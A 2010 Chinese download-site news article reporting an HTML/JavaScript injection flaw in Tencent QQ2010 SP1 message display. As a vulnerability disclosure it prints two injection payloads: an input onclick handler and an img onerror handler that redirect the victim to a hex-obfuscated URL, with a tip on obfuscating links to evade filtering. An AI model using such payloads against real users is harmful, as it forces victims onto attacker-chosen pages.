专业的QQ下载站 本站非腾讯QQ官方网站

QQ下载|QQ资讯|QQ分类|下载排行|最近更新

当前位置:首页腾讯动态QQ新闻中心 → 腾讯QQ2010SP1正式版惊现低级漏洞

腾讯QQ2010SP1正式版惊现低级漏洞

时间:2010/7/29 14:36:00人气:0作者:丫丫我要评论(0)

 腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。用户可以随意在消息中使用Javascript、Html,腾讯并没有对此进行有效的屏蔽,如此低级漏洞,在QQ这样的软件中出现实属罕见。

    截止发稿之日起,腾讯还没有对此漏洞给出解决办法,网友只有去下载试用QQ2010正式版来避免此问题。

 

    点击下载:QQ2010SP1正式版

    首先囧一下:脚本出错还会提示错误

 

腾讯QQ 2010SP1发布即现严重低级漏洞

 

    1、消息记录的Javascript、Html标签没有屏蔽

 

腾讯QQ 2010SP1发布即现严重低级漏洞

 

    2、消息盒子Javascript、Html标签没有屏蔽

 

腾讯QQ 2010SP1发布即现严重低级漏洞

 

    3、小实验

    1、发送代码:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

    因为腾讯会自动将url转换,我们必须混淆url才能发送

 

腾讯QQ 2010SP1发布即现严重低级漏洞

 

 

腾讯QQ 2010SP1发布即现严重低级漏洞

 

 

腾讯QQ 2010SP1发布即现严重低级漏洞

 

    4、超牛代码

    <img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

    因为要点击才能触发,想到一个不用点击就能触发的代码。

    5、希望腾讯快点修复,这个漏洞非同小可

    6、本漏洞由TGL发现。

 

腾讯QQ 2010SP1发布即现严重低级漏洞

猜你喜欢

网友评论

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

热门评论

最新评论

已有0人参与,点击查看更多精彩评论

关于腾牛 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2005-2018 QQTN.com 【腾牛网】 版权所有 鄂ICP备17010784号-1 | 鄂公网安备 42011102000245号

声明: 本站非腾讯QQ官方网站 所有软件和文章来自互联网 如有异议 请与本站联系 本站为非赢利性网站 不接受任何赞助和广告